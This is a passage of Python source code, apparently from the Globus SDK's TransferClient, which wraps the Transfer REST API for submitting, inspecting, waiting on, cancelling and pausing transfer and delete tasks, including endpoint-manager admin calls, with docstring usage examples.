symlink_target, path, query_params\n )\n )\n resource_path = self.qjoin_path(\"operation/endpoint\", endpoint_id_s, \"symlink\")\n data = {\n \"DATA_TYPE\": \"symlink\",\n \"symlink_target\": symlink_target,\n \"path\": path,\n }\n return self.post(resource_path, data=data, query_params=query_params)\n\n #\n # Task Submission\n #\n\n def get_submission_id(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n ``GET /submission_id``\n\n :rtype: :class:`TransferResponse\n `\n\n Submission IDs are required to submit tasks to the Transfer service\n via the :meth:`submit_transfer <.submit_transfer>` and\n :meth:`submit_delete <.submit_delete>` methods.\n\n Most users will not need to call this method directly, as the\n convenience classes :class:`TransferData `\n and :class:`DeleteData ` will call it\n automatically if they are not passed a ``submission_id`` explicitly.\n\n **External Documentation**\n\n See\n `Get a submission id \\\n `_\n in the REST documentation for more details.\n \"\"\"\n log.info(f\"TransferClient.get_submission_id({query_params})\")\n return self.get(\"submission_id\", query_params=query_params)\n\n def submit_transfer(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /transfer``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> tdata = 
globus_sdk.TransferData(tc, source_endpoint_id,\n >>> destination_endpoint_id,\n >>> label=\"SDK example\",\n >>> sync_level=\"checksum\")\n >>> tdata.add_item(\"/source/path/dir/\", \"/dest/path/dir/\",\n >>> recursive=True)\n >>> tdata.add_item(\"/source/path/file.txt\",\n >>> \"/dest/path/file.txt\")\n >>> transfer_result = tc.submit_transfer(tdata)\n >>> print(\"task_id =\", transfer_result[\"task_id\"])\n\n The `data` parameter can be a normal Python dictionary, or\n a :class:`TransferData ` object.\n\n **External Documentation**\n\n See\n `Submit a transfer task \\\n `_\n in the REST documentation for more details.\n \"\"\"\n log.info(\"TransferClient.submit_transfer(...)\")\n return self.post(\"/transfer\", data=data)\n\n def submit_delete(self, data) -> response.GlobusHTTPResponse:\n \"\"\"\n ``POST /delete``\n\n :rtype: :class:`TransferResponse\n `\n\n **Examples**\n\n >>> tc = globus_sdk.TransferClient(...)\n >>> ddata = globus_sdk.DeleteData(tc, endpoint_id, recursive=True)\n >>> ddata.add_item(\"/dir/to/delete/\")\n >>> ddata.add_item(\"/file/to/delete/file.txt\")\n >>> delete_result = tc.submit_delete(ddata)\n >>> print(\"task_id =\", delete_result[\"task_id\"])\n\n The `data` parameter can be a normal Python dictionary, or\n a :class:`DeleteData ` object.\n\n **External Documentation**\n\n See\n `Submit a delete task \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.submit_delete(...)\")\n return self.post(\"/delete\", data=data)\n\n #\n # Task inspection and management\n #\n\n @paging.has_paginator(\n paging.LimitOffsetTotalPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=1000,\n )\n def task_list(\n self,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n \"\"\"\n Get an iterable of task documents owned by the current user.\n\n ``GET /task_list``\n\n :param limit: limit the number of results\n :type limit: int, optional\n :param offset: offset used in paging\n :type offset: int, optional\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Examples**\n\n Fetch 10 tasks and print some basic info:\n\n >>> tc = TransferClient(...)\n >>> for task in tc.task_list(limit=10):\n >>> print(\"Task({}): {} -> {}\".format(\n >>> task[\"task_id\"], task[\"source_endpoint\"],\n >>> task[\"destination_endpoint\"]))\n\n **External Documentation**\n\n See\n `Task list \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(\"TransferClient.task_list(...)\")\n if query_params is None:\n query_params = {}\n if limit is not None:\n query_params[\"limit\"] = limit\n if offset is not None:\n query_params[\"offset\"] = offset\n return IterableTransferResponse(\n self.get(\"task_list\", query_params=query_params)\n )\n\n @paging.has_paginator(\n paging.LimitOffsetTotalPaginator,\n items_key=\"DATA\",\n get_page_size=_get_page_size,\n max_total_results=1000,\n page_size=1000,\n )\n def task_event_list(\n self,\n task_id: ID_PARAM_TYPE,\n limit: Optional[int] = None,\n offset: Optional[int] = None,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> IterableTransferResponse:\n r\"\"\"\n List events (for example, faults and errors) for a given Task.\n\n ``GET /task//event_list``\n\n :param task_id: The ID of the task to inspect.\n :type task_id: str\n :param limit: limit the 
number of results\n        :type limit: int, optional\n        :param offset: offset used in paging\n        :type offset: int, optional\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **Examples**\n\n        Fetch 10 events and print some basic info:\n\n        >>> tc = TransferClient(...)\n        >>> task_id = ...\n        >>> for event in tc.task_event_list(task_id, limit=10):\n        >>>     print(\"Event on Task({}) at {}:\\n{}\".format(\n        >>>         task_id, event[\"time\"], event[\"description\"]))\n\n        **External Documentation**\n\n        See\n        `Get event list \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.task_event_list({task_id_s}, ...)\")\n        path = self.qjoin_path(\"task\", task_id_s, \"event_list\")\n        if query_params is None:\n            query_params = {}\n        if limit is not None:\n            query_params[\"limit\"] = limit\n        if offset is not None:\n            query_params[\"offset\"] = offset\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n\n    def get_task(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        ``GET /task/``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task by id \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.get_task({task_id_s}, ...)\")\n        resource_path = self.qjoin_path(\"task\", task_id_s)\n        return self.get(resource_path, query_params=query_params)\n\n    def update_task(\n        self,\n        task_id: ID_PARAM_TYPE,\n        data: Dict,\n        query_params: Optional[Dict[str, Any]] = None,\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        ``PUT /task/``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Update task by id \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.update_task({task_id_s}, ...)\")\n        resource_path = self.qjoin_path(\"task\", task_id_s)\n        return self.put(resource_path, data=data, query_params=query_params)\n\n    def cancel_task(self, task_id: ID_PARAM_TYPE) -> response.GlobusHTTPResponse:\n        \"\"\"\n        ``POST /task//cancel``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Cancel task by id \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.cancel_task({task_id_s})\")\n        resource_path = self.qjoin_path(\"task\", task_id_s, \"cancel\")\n        return self.post(resource_path)\n\n    def task_wait(\n        self, task_id: ID_PARAM_TYPE, timeout=10, polling_interval=10\n    ) -> bool:\n        r\"\"\"\n        Wait until a Task completes or fails, with a time limit. If the task\n        is \"ACTIVE\" after time runs out, returns ``False``. Otherwise returns\n        ``True``.\n\n        :param task_id: ID of the Task to wait on for completion\n        :type task_id: str\n        :param timeout: Number of seconds to wait in total. Minimum 1. [Default: ``10``]\n        :type timeout: int, optional\n        :param polling_interval: Number of seconds between queries to Globus about the\n            Task status. Minimum 1. 
[Default: ``10``]\n        :type polling_interval: int, optional\n\n        **Examples**\n\n        If you want to wait for a task to terminate, but want to warn every\n        minute that it hasn't terminated yet, you could:\n\n        >>> tc = TransferClient(...)\n        >>> while not tc.task_wait(task_id, timeout=60):\n        >>>     print(\"Another minute went by without {0} terminating\"\n        >>>           .format(task_id))\n\n        Or perhaps you want to check on a task every minute for 10 minutes, and\n        give up if it doesn't complete in that time:\n\n        >>> tc = TransferClient(...)\n        >>> done = tc.task_wait(task_id, timeout=600, polling_interval=60)\n        >>> if not done:\n        >>>     print(\"{0} didn't successfully terminate!\"\n        >>>           .format(task_id))\n        >>> else:\n        >>>     print(\"{0} completed\".format(task_id))\n\n        You could print dots while you wait for a task by only waiting one\n        second at a time:\n\n        >>> tc = TransferClient(...)\n        >>> while not tc.task_wait(task_id, timeout=1, polling_interval=1):\n        >>>     print(\".\", end=\"\")\n        >>> print(\"\\n{0} completed!\".format(task_id))\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(\n            \"TransferClient.task_wait({}, {}, {})\".format(\n                task_id_s, timeout, polling_interval\n            )\n        )\n\n        # check valid args\n        if timeout < 1:\n            log.error(f\"task_wait() timeout={timeout} is less than minimum of 1s\")\n            raise exc.GlobusSDKUsageError(\n                \"TransferClient.task_wait timeout has a minimum of 1\"\n            )\n        if polling_interval < 1:\n            log.error(\n                \"task_wait() polling_interval={} is less than minimum of 1s\".format(\n                    polling_interval\n                )\n            )\n            raise exc.GlobusSDKUsageError(\n                \"TransferClient.task_wait polling_interval has a minimum of 1\"\n            )\n\n        # ensure that we always wait at least one interval, even if the timeout\n        # is shorter than the polling interval, by reducing the interval to the\n        # timeout if it is larger\n        polling_interval = min(timeout, polling_interval)\n\n        # helper for readability\n        def timed_out(waited_time):\n            return waited_time > timeout\n\n        waited_time = 0\n        # doing this as a while-True loop actually makes it simpler than doing\n        # while not timed_out(waited_time) because of the end condition\n        while True:\n            # get task, check if status != ACTIVE\n            task = self.get_task(task_id_s)\n            status = task[\"status\"]\n            if status != \"ACTIVE\":\n                log.debug(\n                    \"task_wait(task_id={}) terminated with status={}\".format(\n                        task_id_s, status\n                    )\n                )\n                return True\n\n            # make sure to check if we timed out before sleeping again, so we\n            # don't sleep an extra polling_interval\n            waited_time += polling_interval\n            if timed_out(waited_time):\n                log.debug(f\"task_wait(task_id={task_id_s}) timed out\")\n                return False\n\n            log.debug(f\"task_wait(task_id={task_id_s}) waiting {polling_interval}s\")\n            time.sleep(polling_interval)\n        # unreachable -- end of task_wait\n\n    def task_pause_info(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        ``GET /task//pause_info``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task pause info \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.task_pause_info({task_id_s}, ...)\")\n        resource_path = self.qjoin_path(\"task\", task_id_s, \"pause_info\")\n        return self.get(resource_path, query_params=query_params)\n\n    @paging.has_paginator(paging.MarkerPaginator, items_key=\"DATA\")\n    def task_successful_transfers(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> 
IterableTransferResponse:\n        \"\"\"\n        Get the successful file transfers for a completed Task.\n\n        .. note::\n\n            Only files that were actually transferred are included. This does\n            not include directories, files that were checked but skipped as\n            part of a sync transfer, or files which were skipped due to\n            skip_source_errors being set on the task.\n\n        ``GET /task//successful_transfers``\n\n        :param task_id: The ID of the task to inspect.\n        :type task_id: str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **Examples**\n\n        Fetch all transferred files for a task and print some basic info:\n\n        >>> tc = TransferClient(...)\n        >>> task_id = ...\n        >>> for info in tc.task_successful_transfers(task_id):\n        >>>     print(\"{} -> {}\".format(\n        >>>         info[\"source_path\"], info[\"destination_path\"]))\n\n        **External Documentation**\n\n        See\n        `Get Task Successful Transfers\\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.task_successful_transfers({task_id_s}, ...)\")\n        path = self.qjoin_path(\"task\", task_id_s, \"successful_transfers\")\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n\n    @paging.has_paginator(paging.MarkerPaginator, items_key=\"DATA\")\n    def task_skipped_errors(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> IterableTransferResponse:\n        \"\"\"\n        Get path and error information for all paths that were skipped due\n        to skip_source_errors being set on a completed transfer Task.\n\n        ``GET /task//skipped_errors``\n\n        :param task_id: The ID of the task to inspect.\n        :type task_id: str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **Examples**\n\n        Fetch all skipped errors for a task and print some basic info:\n\n        >>> tc = TransferClient(...)\n        >>> task_id = ...\n        >>> for info in tc.task_skipped_errors(task_id):\n        >>>     print(\"{} -> {}\".format(\n        >>>         info[\"error_code\"], info[\"source_path\"]))\n\n        **External Documentation**\n\n        See\n        `Get Task Skipped Errors\\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(\"TransferClient.task_skipped_errors(%s, ...)\", task_id_s)\n        resource_path = self.qjoin_path(\"task\", task_id_s, \"skipped_errors\")\n        return IterableTransferResponse(\n            self.get(resource_path, query_params=query_params)\n        )\n\n    #\n    # advanced endpoint management (requires endpoint manager role)\n    #\n\n    def endpoint_manager_monitored_endpoints(\n        self, query_params: Optional[Dict[str, Any]] = None\n    ) -> IterableTransferResponse:\n        \"\"\"\n        Get endpoints the current user is a monitor or manager on.\n\n        ``GET endpoint_manager/monitored_endpoints``\n\n        :rtype: iterable of :class:`GlobusResponse\n                `\n\n        See\n        `Get monitored endpoints \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        log.info(f\"TransferClient.endpoint_manager_monitored_endpoints({query_params})\")\n        path = self.qjoin_path(\"endpoint_manager\", \"monitored_endpoints\")\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n\n    def endpoint_manager_hosted_endpoint_list(\n        self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> IterableTransferResponse:\n        \"\"\"\n        Get shared endpoints 
hosted on the given endpoint.\n\n ``GET /endpoint_manager/endpoint//hosted_endpoint_list``\n\n :rtype: iterable of :class:`GlobusResponse\n `\n\n See\n `Get hosted endpoint list \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n f\"TransferClient.endpoint_manager_hosted_endpoint_list({endpoint_id_s})\"\n )\n path = self.qjoin_path(\n \"endpoint_manager\", \"endpoint\", endpoint_id_s, \"hosted_endpoint_list\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_get_endpoint(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Get endpoint details as an admin.\n\n ``GET /endpoint_manager/endpoint/``\n\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(f\"TransferClient.endpoint_manager_get_endpoint({endpoint_id_s})\")\n path = self.qjoin_path(\"endpoint_manager\", \"endpoint\", endpoint_id_s)\n return self.get(path, query_params=query_params)\n\n def endpoint_manager_acl_list(\n self, endpoint_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n \"\"\"\n Get a list of access control rules on specified endpoint as an admin.\n\n ``GET endpoint_manager/endpoint//access_list``\n\n :rtype: :class:`IterableTransferResponse\n `\n\n **External Documentation**\n\n See\n `Get endpoint access list as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n endpoint_id_s = utils.safe_stringify(endpoint_id)\n log.info(\n f\"TransferClient.endpoint_manager_endpoint_acl_list({endpoint_id_s}, ...)\"\n )\n path = self.qjoin_path(\n \"endpoint_manager\", \"endpoint\", endpoint_id_s, \"access_list\"\n )\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n #\n # endpoint manager task methods\n #\n\n @paging.has_paginator(paging.LastKeyPaginator, items_key=\"DATA\")\n def endpoint_manager_task_list(\n self, query_params: Optional[Dict[str, Any]] = None\n ) -> IterableTransferResponse:\n r\"\"\"\n Get a list of tasks visible via ``activity_monitor`` role, as opposed\n to tasks owned by the current user.\n\n ``GET endpoint_manager/task_list``\n\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`IterableTransferResponse\n `\n\n **Filters**\n\n The following filters are supported (passed as keyword arguments in\n ``query_params``). For any query that doesn’t specify a filter_status\n that is a subset of (\"ACTIVE\", \"INACTIVE\"), at least one of\n filter_task_id or filter_endpoint is required.\n\n ====================== ================ ========================\n Query Parameter Filter Type Description\n ====================== ================ ========================\n filter_status equality list |filter_status|\n filter_task_id equality list |filter_task_id|\n filter_owner_id equality |filter_owner_id|\n filter_endpoint equality |filter_endpoint|\n filter_is_paused boolean equality |filter_is_paused|\n filter_completion_time datetime range |filter_completion_time|\n filter_min_faults int |filter_min_faults|\n filter_local_user equality |filter_local_user|\n ====================== ================ ========================\n\n .. 
|filter_status| replace::\n            Comma separated list of task statuses. Return only tasks with any of the\n            specified statuses. Note that in-progress tasks will have status \"ACTIVE\" or\n            \"INACTIVE\", and completed tasks will have status \"SUCCEEDED\" or \"FAILED\".\n\n        .. |filter_task_id| replace::\n            Comma separated list of task_ids, limit 50. Return only tasks with any of\n            the specified ids. If any of the specified tasks do not involve an endpoint\n            the user has an appropriate role for, a ``PermissionDenied`` error will be\n            returned. This filter can't be combined with any other filter. If another\n            filter is passed, a ``BadRequest`` will be returned.\n\n        .. |filter_owner_id| replace::\n            A Globus Auth identity id. Limit results to tasks submitted by the specified\n            identity, or linked to the specified identity, at submit time. Returns\n            ``UserNotFound`` if the identity does not exist or has never used the Globus\n            Transfer service. If no tasks were submitted by this user to an endpoint the\n            current user has an appropriate role on, an empty result set will be\n            returned. Unless filtering for running tasks (i.e. ``filter_status`` is a\n            subset of (\"ACTIVE\", \"INACTIVE\")), ``filter_endpoint`` is required when using\n            ``filter_owner_id``.\n\n        .. |filter_endpoint| replace::\n            Single endpoint id or canonical name. Using canonical name is deprecated.\n            Return only tasks with a matching source or destination endpoint or matching\n            source or destination host endpoint.\n\n        .. |filter_is_paused| replace::\n            Return only tasks with the specified ``is_paused`` value. Requires that\n            ``filter_status`` is also passed and contains a subset of \"ACTIVE\" and\n            \"INACTIVE\". Completed tasks always have ``is_paused`` equal to \"false\" and\n            filtering on their paused state is not useful and not supported. Note that\n            pausing is an async operation, and after a pause rule is inserted it will\n            take time before the is_paused flag is set on all affected tasks. Tasks\n            paused by id will have the ``is_paused`` flag set immediately.\n\n        .. |filter_completion_time| replace::\n            Start and end date-times separated by a comma. Each datetime should be\n            specified as a string in ISO 8601 format: ``YYYY-MM-DDTHH:MM:SS``, where the\n            \"T\" separating date and time is literal, with optional \\+/-HH:MM for\n            timezone. If no timezone is specified, UTC is assumed, or a trailing \"Z\" can\n            be specified to make UTC explicit. A space can be used between the date and\n            time instead of the \"T\". A blank string may be used for either the start or\n            end (but not both) to indicate no limit on that side. Returns only complete\n            tasks with ``completion_time`` in the specified range. If the end date is\n            blank, it will also include all active tasks, since they will complete some\n            time in the future.\n\n        .. |filter_min_faults| replace::\n            Minimum number of cumulative faults, inclusive. Return only tasks with\n            ``faults >= N``, where N is the filter value. Use ``filter_min_faults=1`` to\n            find all tasks with at least one fault. Note that many errors are not fatal\n            and the task may still be successful even if ``faults >= 1``.\n\n        .. |filter_local_user| replace::\n            A valid username for the target system running the endpoint, as a utf8\n            encoded string. Requires that ``filter_endpoint`` is also set. 
Return only\n            tasks that have successfully fetched the local user from the endpoint, and\n            match the values of ``filter_endpoint`` and ``filter_local_user`` on the\n            source or on the destination.\n\n        **Examples**\n\n        Fetch some tasks and print some basic info:\n\n        >>> tc = TransferClient(...)\n        >>> for task in tc.endpoint_manager_task_list(filter_status=\"ACTIVE\"):\n        >>>     print(\"Task({}): {} -> {}\\n  was submitted by\\n  {}\".format(\n        >>>         task[\"task_id\"], task[\"source_endpoint\"],\n        >>>         task[\"destination_endpoint\"], task[\"owner_string\"]))\n\n        Do that same operation on *all* tasks visible via the ``activity_monitor``\n        role:\n\n        >>> tc = TransferClient(...)\n        >>> for page in tc.paginated.endpoint_manager_task_list(\n        >>>     filter_status=\"ACTIVE\"\n        >>> ):\n        >>>     for task in page:\n        >>>         print(\"Task({}): {} -> {}\\n  was submitted by\\n  {}\".format(\n        >>>             task[\"task_id\"], task[\"source_endpoint\"],\n        >>>             task[\"destination_endpoint\"], task[\"owner_string\"]))\n\n        **External Documentation**\n\n        See\n        `Advanced Endpoint Management: Get tasks \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        log.info(\"TransferClient.endpoint_manager_task_list(...)\")\n        path = self.qjoin_path(\"endpoint_manager\", \"task_list\")\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n\n    def endpoint_manager_get_task(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Get task info as an admin. Requires activity monitor effective role on\n        the destination endpoint of the task.\n\n        ``GET /endpoint_manager/task/``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task as admin \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.endpoint_manager_get_task({task_id_s}, ...)\")\n        path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s)\n        return self.get(path, query_params=query_params)\n
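    # A hypothetical admin lookup sketch (tc and task_id are placeholders,\n    # not part of the SDK source):\n    #\n    #     task_doc = tc.endpoint_manager_get_task(task_id)\n    #     print(task_doc[\"status\"], task_doc[\"owner_string\"])\n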
\n    @paging.has_paginator(\n        paging.LimitOffsetTotalPaginator,\n        items_key=\"DATA\",\n        get_page_size=_get_page_size,\n        max_total_results=1000,\n        page_size=1000,\n    )\n    def endpoint_manager_task_event_list(\n        self,\n        task_id: ID_PARAM_TYPE,\n        limit: Optional[int] = None,\n        offset: Optional[int] = None,\n        query_params: Optional[Dict[str, Any]] = None,\n    ) -> IterableTransferResponse:\n        \"\"\"\n        List events (for example, faults and errors) for a given task as an\n        admin. Requires activity monitor effective role on the destination\n        endpoint of the task.\n\n        ``GET /endpoint_manager/task//event_list``\n\n        :param task_id: The ID of the task to inspect.\n        :type task_id: str\n        :param limit: limit the number of results\n        :type limit: int, optional\n        :param offset: offset used in paging\n        :type offset: int, optional\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task events as admin \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.endpoint_manager_task_event_list({task_id_s}, ...)\")\n        path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s, \"event_list\")\n        if query_params is None:\n            query_params = {}\n        if limit is not None:\n            query_params[\"limit\"] = limit\n        if offset is not None:\n            query_params[\"offset\"] = offset\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n\n    def endpoint_manager_task_pause_info(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Get details about why a task is paused as an admin. Requires activity\n        monitor effective role on the destination endpoint of the task.\n\n        ``GET /endpoint_manager/task//pause_info``\n\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task pause info as admin \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(f\"TransferClient.endpoint_manager_task_pause_info({task_id_s}, ...)\")\n        path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s, \"pause_info\")\n        return self.get(path, query_params=query_params)\n\n    @paging.has_paginator(paging.MarkerPaginator, items_key=\"DATA\")\n    def endpoint_manager_task_successful_transfers(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> IterableTransferResponse:\n        \"\"\"\n        Get the successful file transfers for a completed Task as an admin.\n\n        ``GET /endpoint_manager/task//successful_transfers``\n\n        :param task_id: The ID of the task to inspect.\n        :type task_id: str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task successful transfers as admin\\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        task_id_s = utils.safe_stringify(task_id)\n        log.info(\n            \"TransferClient.endpoint_manager_task_successful_transfers(%s, ...)\",\n            task_id_s,\n        )\n        path = self.qjoin_path(\n            \"endpoint_manager\", \"task\", task_id_s, \"successful_transfers\"\n        )\n        return IterableTransferResponse(self.get(path, query_params=query_params))\n\n    def endpoint_manager_task_skipped_errors(\n        self, task_id: ID_PARAM_TYPE, query_params: Optional[Dict[str, Any]] = None\n    ) -> IterableTransferResponse:\n        \"\"\"\n        Get skipped errors for a completed Task as an admin.\n\n        ``GET /endpoint_manager/task//skipped_errors``\n\n        :param task_id: The ID of the task to inspect.\n        :type task_id: str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`IterableTransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Get task skipped errors as admin\\\n        `_\n        in the REST documentation for details.\n        
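\n        **Examples**\n\n        A sketch of typical usage, assuming ``task_id`` references a completed\n        task on an endpoint where you hold the activity monitor role:\n\n        >>> tc = TransferClient(...)\n        >>> task_id = ...\n        >>> for info in tc.endpoint_manager_task_skipped_errors(task_id):\n        >>>     print(\"{} -> {}\".format(\n        >>>         info[\"error_code\"], info[\"source_path\"]))\n        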
\"\"\"\n task_id_s = utils.safe_stringify(task_id)\n log.info(\n f\"TransferClient.endpoint_manager_task_skipped_errors({task_id_s}, ...)\"\n )\n path = self.qjoin_path(\"endpoint_manager\", \"task\", task_id_s, \"skipped_errors\")\n return IterableTransferResponse(self.get(path, query_params=query_params))\n\n def endpoint_manager_cancel_tasks(\n self,\n task_ids: Iterable[ID_PARAM_TYPE],\n message,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Cancel a list of tasks as an admin. Requires activity manager effective\n role on the task(s) source or destination endpoint(s).\n\n ``POST /endpoint_manager/admin_cancel``\n\n :param task_ids: List of task ids to cancel.\n :type task_ids: iterable of str\n :param message: Message given to all users who's tasks have been canceled.\n :type message: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Cancel tasks as admin \\\n `_\n in the REST documentation for details.\n \"\"\"\n str_task_ids = [utils.safe_stringify(i) for i in task_ids]\n message = utils.safe_stringify(message)\n log.info(\n f\"TransferClient.endpoint_manager_cancel_tasks({str_task_ids}, {message})\"\n )\n data = {\"message\": utils.safe_stringify(message), \"task_id_list\": str_task_ids}\n path = self.qjoin_path(\"endpoint_manager\", \"admin_cancel\")\n return self.post(path, data=data, query_params=query_params)\n\n def endpoint_manager_cancel_status(\n self, admin_cancel_id, query_params: Optional[Dict[str, Any]] = None\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Get the status of an an admin cancel (result of\n endpoint_manager_cancel_tasks).\n\n ``GET /endpoint_manager/admin_cancel/``\n\n :param admin_cancel_id: The ID of the the cancel job to inspect.\n :type admin_cancel_id: str\n :param query_params: Any additional parameters will be passed through\n as query params.\n :type query_params: dict, optional\n :rtype: :class:`TransferResponse\n `\n\n **External Documentation**\n\n See\n `Get cancel status by id \\\n `_\n in the REST documentation for details.\n \"\"\"\n log.info(f\"TransferClient.endpoint_manager_cancel_status({admin_cancel_id})\")\n path = self.qjoin_path(\"endpoint_manager\", \"admin_cancel\", admin_cancel_id)\n return self.get(path, query_params=query_params)\n\n def endpoint_manager_pause_tasks(\n self,\n task_ids: Iterable[ID_PARAM_TYPE],\n message,\n query_params: Optional[Dict[str, Any]] = None,\n ) -> response.GlobusHTTPResponse:\n \"\"\"\n Pause a list of tasks as an admin. 
Requires the activity manager\n        effective role on the source or destination endpoint(s) of the task(s).\n\n        ``POST /endpoint_manager/admin_pause``\n\n        :param task_ids: List of task ids to pause.\n        :type task_ids: iterable of str\n        :param message: Message given to all users whose tasks have been paused.\n        :type message: str\n        :param query_params: Any additional parameters will be passed through\n            as query params.\n        :type query_params: dict, optional\n        :rtype: :class:`TransferResponse\n                `\n\n        **External Documentation**\n\n        See\n        `Pause tasks as admin \\\n        `_\n        in the REST documentation for details.\n        \"\"\"\n        str_task_ids = [utils.safe_stringify(i) for i in task_ids]\n        message = utils.safe_stringify(message)\n        log.info(\n            f\"TransferClient.endpoint_manager_pause_tasks({str_task_ids}, {message})\"\n        )\n        data = {\n            \"message\": message,\n            \"task_id_list\": str_task_ids,\n        }\n        path = self.qjoin_path(\"endpoint_manager\", \"admin_pause\")\n        return self.post(path, data=data, query_params=query_params)\n\n    def endpoint_manager_resume_tasks(\n        self,\n        task_ids: Iterable[ID_PARAM_TYPE],\n        query_params: Optional[Dict[str, Any]] = None,\n    ) -> response.GlobusHTTPResponse:\n        \"\"\"\n        Resume a list of tasks as an admin. Requires the activity manager\n        effective role on the source or destination endpoint(s) of the 